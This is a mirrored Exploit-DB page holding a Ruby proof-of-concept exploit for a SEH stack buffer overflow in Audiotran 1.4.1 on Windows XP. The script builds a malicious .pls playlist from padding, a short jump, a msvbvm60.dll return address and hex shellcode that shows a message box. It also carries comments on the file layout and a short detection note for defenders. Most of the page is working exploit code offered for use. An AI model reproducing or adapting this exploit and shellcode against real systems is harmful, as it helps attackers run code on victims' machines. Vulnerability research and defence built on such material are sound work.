Audiotran 1.4.1 (Windows XP SP2/SP3 English) – Local Buffer Overflow

  • 作者: Sébastien Duquette
    日期: 2010-01-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11079/
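  #!/usr/bin/ruby
    #
    # Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
    # Date: January 9th, 2010
    # Author: Sébastien Duquette
    # Software Link : http://www.e-soft.co.uk/Audiotran.htm
    # Version : 1.4.1
    # OS: Windows
    # Tested on : XP SP2/SP3 En (VMware)
    # Type of vuln: Stack Overflow / SEH
    # Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
    #
    # Script provided 'as is', without any warranty.
    # Use for educational purposes only.
    #
    # What this script does: it prints a banner and writes one playlist
    # file, audiotran_poc.pls, in the current directory.  The file is laid
    # out as 1308 bytes of 'A' padding, a 4-byte short jump, a 4-byte
    # address inside msvbvm60.dll, the message-box payload below, and a
    # further 9000 bytes of 'A' padding (10571 bytes in total).  Nothing
    # is executed locally; the file is only written to disk.
    #
    # Defender note: a .pls file of roughly 10 KB that is almost entirely
    # repeated 'A' bytes wrapped around a short binary blob is a simple
    # signature for scanning playlist attachments or downloads.
    #
    
    banner =
    "|------------------------------------------------------------------|\n" +
    "| __ __|\n" +
    "| _________________/ /___ _____ / /________ _____ ___|\n" +
    "|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n" +
    "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n" +
    "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n" +
    "||\n" +
    "| http://www.corelan.be:8800 |\n" +
    "||\n" +
    "|-------------------------------------------------[ EIP Hunters ]--|\n\n"
    
    # Corelan Team MsgBox (255 bytes; the trailing ASCII is the message text)
    payload =
    "\xeb\x22\x56\x31\xc0\x64\x8b\x40\x30\x85\xc0\x78" +
    "\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb" +
    "\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x5e\xc3" +
    "\xeb\x69\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54" +
    "\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb" +
    "\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" +
    "\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
    "\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb" +
    "\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b" +
    "\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8" +
    "\xaa\xff\xff\xff\x89\x07\x44\x44\x44\x44\x44\x44" +
    "\x44\x44\x47\x47\x47\x47\x39\xce\x75\xe6\xc3\x4c" +
    "\x4c\x4c\x4c\x89\xe5\xe8\x68\xff\xff\xff\x89\xc2" +
    "\xeb\x1c\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8" +
    "\xc8\xff\xff\xff\xeb\x15\x31\xd2\x59\x88\x51\x36" +
    "\x51\x52\xff\x54\x24\x0c\xe8\xdf\xff\xff\xff\x57" +
    "\x7f\x29\x62\xe8\xe6\xff\xff\xff\x43\x6f\x72\x65" +
    "\x6c\x61\x6e\x20\x54\x65\x61\x6d\x20\x53\x68\x65" +
    "\x6c\x6c\x63\x6f\x64\x65\x20\x2d\x20\x50\x72\x6f" +
    "\x67\x72\x61\x6d\x20\x65\x78\x70\x6c\x6f\x69\x74" +
    "\x65\x64\x20\x73\x75\x63\x65\x73\x73\x66\x75\x6c" +
    "\x6c\x79\x58"
    
    print banner
    puts "[+] Exploit for Audiotran 1.4.1."
    
    filename = "audiotran_poc.pls"
    # Block form: the handle is closed even if one of the writes raises,
    # which the explicit File.new / f.close pair did not guarantee.
    File.open(filename, 'w') do |f|
      f.write 'A' * 1308         # leading padding
      f.write "\xeb\x06\x90\x90" # EB 06: short jump over the next 4 bytes
      f.write "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
      f.write payload
      f.write 'A' * 9000         # trailing padding
    end
    
    # Bug fix: the status line printed the literal text "#(unknown)" because
    # the interpolation was mangled; report the file name that was written.
    puts "[+] Wrote exploit file : #{filename}."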